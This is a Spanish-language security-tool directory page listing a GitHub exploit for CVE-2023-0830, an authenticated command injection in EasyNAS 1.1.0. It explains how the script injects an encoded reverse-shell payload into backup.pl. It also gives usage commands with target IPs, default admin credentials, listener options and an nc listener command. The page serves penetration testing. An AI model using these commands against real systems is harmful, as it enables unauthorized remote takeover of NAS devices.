Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-0830 — Exploit para EasyNAS versión 1.1.0. La vulnerabilidad explotada es una falla de inyección de comandos, que requiere autenticación. | Kitploit
Herramientas/GitHubGitHub/xbz0n/cve-2023-0830
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

Exploit para EasyNAS versión 1.1.0. La vulnerabilidad explotada es una falla de inyección de comandos, que requiere autenticación.

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-0830: Exploit de inyección de comandos del sistema operativo autenticada en EasyNAS 1.1.0

Este script de Python es un exploit potente para EasyNAS versión 1.1.0 con funcionalidad mejorada, incluido un listener integrado. La vulnerabilidad explotada es una falla de inyección de comandos que requiere autenticación.

El script establece una sesión con el servidor objetivo y luego envía una solicitud de inicio de sesión con las credenciales proporcionadas por el usuario. Tras una autenticación exitosa, el script construye un payload que, al ejecutarse, abre una conexión de shell inversa a una IP y un puerto especificados por el usuario. Este payload está codificado en URL y Base64, y luego se inyecta en el archivo backup.pl del servidor mediante una solicitud GET manipulada.

CVE: CVE-2023-0830

Autor del exploit

Ivan Spiridonov (xbz0n) https://xbz0n.sh

Página web del proveedor

https://www.easynas.org

Características

  • Listener de shell inversa integrado: no necesita un proceso netcat separado
  • Detección automática de la dirección IP para el listener
  • Opción para usar diferentes tipos de shell (bash, sh, python)
  • Soporte para HTTP y HTTPS
  • Soporte para listeners externos

Uso

Uso básico con listener integrado (recomendado):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin

Uso con listener externo (inicie nc -lvnp 4444 primero):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444

Opciones:

root@kitploit:~
--mode {shell,reverse}    Modo de explotación: shell (shell inversa integrada) o reverse (listener externo)
--lhost IP_ADDRESS        Dirección IP para el listener de shell inversa (auto-detectada por defecto)
--lport PORT              Puerto para el listener de shell inversa (por defecto: 4444)
--protocol {http,https}   Protocolo a usar (por defecto: https)
--verbose                 Habilitar salida verbosa
--shell {bash,sh,python}  Especificar el tipo de shell a usar con el listener integrado (por defecto: bash)

Dependencias

  • Python 3
  • Biblioteca Requests

Aviso legal

Este script es solo para fines educativos y pruebas de penetración autorizadas. Siempre solicite permiso explícito antes de ejecutar cualquier prueba de penetración contra una red o sistema.

Por favor, úselo de forma responsable.

Descargar herramienta